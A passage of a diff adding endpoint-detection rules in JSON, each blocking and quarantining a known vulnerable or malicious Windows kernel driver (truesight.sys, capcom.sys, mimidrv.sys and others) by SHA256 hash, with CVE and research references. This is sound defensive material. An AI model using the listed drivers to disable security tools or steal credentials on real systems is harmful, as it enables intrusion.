+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973466Z",
+ "creation_date": "2026-03-23T11:45:29.973468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12eda8b65ed8c1d80464a0c535ea099dffdb4981c134294cb0fa424efc85ee56",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a494d902-5e8c-5314-b400-2407d8cb0c45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967362Z",
+ "creation_date": "2026-03-23T11:45:29.967364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c856c3c315c0f213684045da3203692c07c3da5df755155fd8b128fb447c437",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4968b88-9f68-5824-8cf3-da9c5c6d8de1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479757Z",
+ "creation_date": "2026-03-23T11:45:30.479759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479765Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b188ae51ec3be082e4d08f7483777ec5e66d30e393a4e9b5b9dc9af93d1f09b",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4991fdd-da7f-57a7-8587-6a117ad6ddfb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621669Z",
+ "creation_date": "2026-03-23T11:45:29.621670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1afa03118f87b62c59a97617e595ebb26dde8dbdd16ee47ef3ddd1097c30ef6a",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4a39d73-91cb-5e25-b342-976c11e311b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143392Z",
+ "creation_date": "2026-03-23T11:45:32.143395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f190919f1668652249fa23d8c0455acbde9d344089fde96566239b1a18b91da2",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://www.loldrivers.io/drivers/fded7e63-0470-40fe-97ed-aa83fd027bad/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4a92be6-a947-537e-87d0-df1ce5ca235d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828306Z",
+ "creation_date": "2026-03-23T11:45:31.828309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1816b4e2ae32be1cbfae6b53a5aa7bab282edaf5c3fd46e463978bb8c432f29",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4b75bd6-ba75-52ce-8038-96decadd39c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614404Z",
+ "creation_date": "2026-03-23T11:45:29.614406Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4b8ab98-2efa-56a4-85cb-3f2daaebfae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472694Z",
+ "creation_date": "2026-03-23T11:45:30.472698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d6febd54ce0c98ea3653e582f7791061923a9a4842bd4a1326564204431ca9f",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4bd89c0-e928-5b3d-ae5e-3b0c92f12db0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821244Z",
+ "creation_date": "2026-03-23T11:45:30.821248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47c490cc83a17ff36a1a92e08d63e76edffba49c9577865315a6c9be6ba80a7d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4c0f9b6-b140-5b80-a787-c011912f0856",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469398Z",
+ "creation_date": "2026-03-23T11:45:30.469401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "284bf9b08be5d4fd4b10fda6736cf490c66f9adace013c19be2e31cf74bfc5e9",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4c3068d-65c9-5ae3-90da-20efe06e93b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500388Z",
+ "creation_date": "2026-03-23T11:45:31.500391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2439616f5ab33d4a8b6d09e17295a10b61f50081be7c6ea958061f849283de38",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4e09588-12f8-570f-9b86-59e51c8975ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832097Z",
+ "creation_date": "2026-03-23T11:45:30.832099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9449b1ed5585f43c4a00d876ea076d86226a5496807ef4e75c4709e4ccfc3dfb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4e4ab18-248f-5d94-becd-16aba6035928",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820425Z",
+ "creation_date": "2026-03-23T11:45:30.820427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fe429c46fedbab8f06e5396056adabbb84a31efef7f9523eb745fc60144db65",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4e8f9d6-5335-5fb1-acaf-1ac39320553e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458693Z",
+ "creation_date": "2026-03-23T11:45:30.458696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdcf71696db4031fe3e70969bbe6169744ff91eebb24d6ffb734f922a850183b",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a4fd2091-4588-5078-ba6b-24bcd7fe2221",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825768Z",
+ "creation_date": "2026-03-23T11:45:31.825770Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c19b55ff88c487dd0cb2cd4087496f611c9df7287ecfeedd9137eef619725fdc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a508712e-8def-598e-8741-23b4ab40866b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614385Z",
+ "creation_date": "2026-03-23T11:45:29.614387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a516abbf-f5f0-5ffc-801e-02e92abac2ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824611Z",
+ "creation_date": "2026-03-23T11:45:31.824613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6253fa6ad371e218a9c08c42781fe95ec32be8a176a6a7231c3a1b7cd2841f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5182727-1449-5a08-968a-d7bc504bce61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142489Z",
+ "creation_date": "2026-03-23T11:45:31.142491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43025fdd42bcc3f0dc50589aed1d8a0650515ea8150886487c7fb5b927d269cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a51a536a-3475-5b37-bd5d-765ca11efa36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497689Z",
+ "creation_date": "2026-03-23T11:45:31.497692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23423b17aa2fed6d0c15a2def325c38c86403349d8ff0b539777c6bbcafcf865",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5367ad2-b0ee-5497-8432-fe0190503a7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819813Z",
+ "creation_date": "2026-03-23T11:45:31.819816Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63a0eb941b89c6b98885b3a2db9d6b21511c813fd065502f182e6b74d87f4b71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a547d991-c8c7-5c7f-9c2d-b2a8d85a85d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611445Z",
+ "creation_date": "2026-03-23T11:45:29.611447Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d3ed9427dcc4f79be3585d41ab9c0bb447d6a0258dd919c4d49e02dedbaa47b",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5534782-f0a0-5abb-a532-8c58c055fcb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829716Z",
+ "creation_date": "2026-03-23T11:45:30.829718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6e9037c7882b36352b507a386a23c71e46a7d8bdec78b0c5cdd3a087b217501",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a5547094-c3f0-5c32-8fa1-dc27bea34e53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823206Z",
+ "creation_date": "2026-03-23T11:45:31.823209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823218Z",
+ "rule_level": null,
